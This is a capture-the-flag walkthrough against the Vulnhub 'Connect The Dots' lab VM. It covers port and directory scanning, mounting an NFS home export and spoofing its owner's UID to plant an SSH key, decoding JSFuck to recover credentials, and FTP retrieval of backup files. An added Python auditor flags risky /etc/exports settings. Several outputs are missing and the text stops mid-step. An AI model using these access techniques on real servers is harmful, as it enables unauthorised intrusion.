Vulnhub Connect The Dots Walkthrough

We start by scanning the host with: nmap -A -T4 -p- 192.168.1.20 -vv

Running dirb http://192.168.1.20 /usr/share/dirb/wordlists/big.txt

Port 111 is open, so we use showmount -e 192.168.1.20 to list the NFS exports

Now we mount the folder to our machine

mkdir /tmp/morris

mount 192.168.1.20:/home/morris /tmp/morris

But now we can’t do anything, as it gives us Permission Denied. Let’s create a morris user on our machine with the same UID and GID as the owner of the share, so we can copy the SSH file to the host.

ls -ld morris

drwxr-xr-x 8 1000 1000 morris 4096 Oct 11 14:40 morris

groupadd --gid 1000 morris_group

useradd --uid 1000 --groups morris_group morris

mkdir morris/.ssh

cp ~/.ssh/id_rsa.pub morris/.ssh/authorized_keys

When we try to log in using ssh morris@192.168.1.20 -p 7822, it asks for a password, so I guess we have to try another way.
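Seen from the server side, the NFS mount above worked because the export was reachable from our host and the default AUTH_SYS security flavour trusts whatever UID the client presents. The following is an added example, not part of the original walkthrough: a small auditor that flags such settings in /etc/exports. The sample export lines and the finding names are constructed for illustration, and only the common "path client(options)" form is handled.

```python
import re

# Constructed sample /etc/exports (not taken from the target VM).
SAMPLE_EXPORTS = """\
/home/morris   *(rw,sync,no_subtree_check)
/srv/backup    192.168.1.0/24(ro,sync) \\
               10.0.0.5(rw,no_root_squash)
/srv/kerb      *.corp.example(rw,sec=krb5p)
/pub           (ro,insecure)   # no client listed, constructed
"""

def parse_exports(text):
    """Yield (path, client, options) for every client of every export."""
    text = text.replace("\\\n", " ")              # join continuation lines
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or [""]:                # no client listed = any host
            m = re.fullmatch(r"([^()]*)(?:\(([^)]*)\))?", spec)
            if m is None:                         # malformed entry, skip it
                continue
            opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
            yield path, m.group(1) or "*", opts

def audit(text):
    """Map (path, client) to the list of risky settings found for it."""
    findings = {}
    for path, client, opts in parse_exports(text):
        sec = next((o[4:] for o in opts if o.startswith("sec=")), "sys")  # default AUTH_SYS
        issues = []
        if client == "*":
            issues.append("any-host")
        if "rw" in opts and "sys" in sec.split(":"):
            issues.append("uid-spoofable-write")  # server trusts the client-supplied UID
        if "no_root_squash" in opts:
            issues.append("no_root_squash")
        if "insecure" in opts:
            issues.append("insecure-ports")
        if path == "/home" or path.startswith("/home/"):
            issues.append("home-export")
        if issues:
            findings[(path, client)] = issues
    return findings

if __name__ == "__main__":
    for (path, client), issues in audit(SAMPLE_EXPORTS).items():
        print(f"{path} -> {client}: {', '.join(issues)}")
```

Restricting the client list and switching the export to a Kerberos flavour (sec=krb5, krb5i or krb5p) removes the UID-matching shortcut, since the server then authenticates the user instead of trusting the number the client sends.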

I downloaded all the files I found on the site, from the pictures to the CSS. Using strings and cat on the pictures didn’t come up with any results, but I found a file, bootstrap.min.cs, to be weird, with a lot of string coding. After looking on Google for a while I found this site, www.jsfuck.com. I copied the content of the file without the “” and removed the var= from the file, ran it, and it came up with:

Now we have another user Norris, and the password TryToGuessThisNorris@2k19

Now, going into FTP, we can download the .bak files to our machine

ftp 192.168.1.20

Norris

TryToGuessThisNorris@2k19

mget *.bak

Going through the files with the strings command, we can see one file, game.jpg.bak

It hit me to see it as Morse code; I decoded it online and got this message

cd to /var/www/html and run ls -la

Trying to open the file .secretfile.swp in the browser, we download it to our machine, and running strings on it gave us:

After enumerating for a while I found we can use the tar command. Now it’s easy to use tar as:
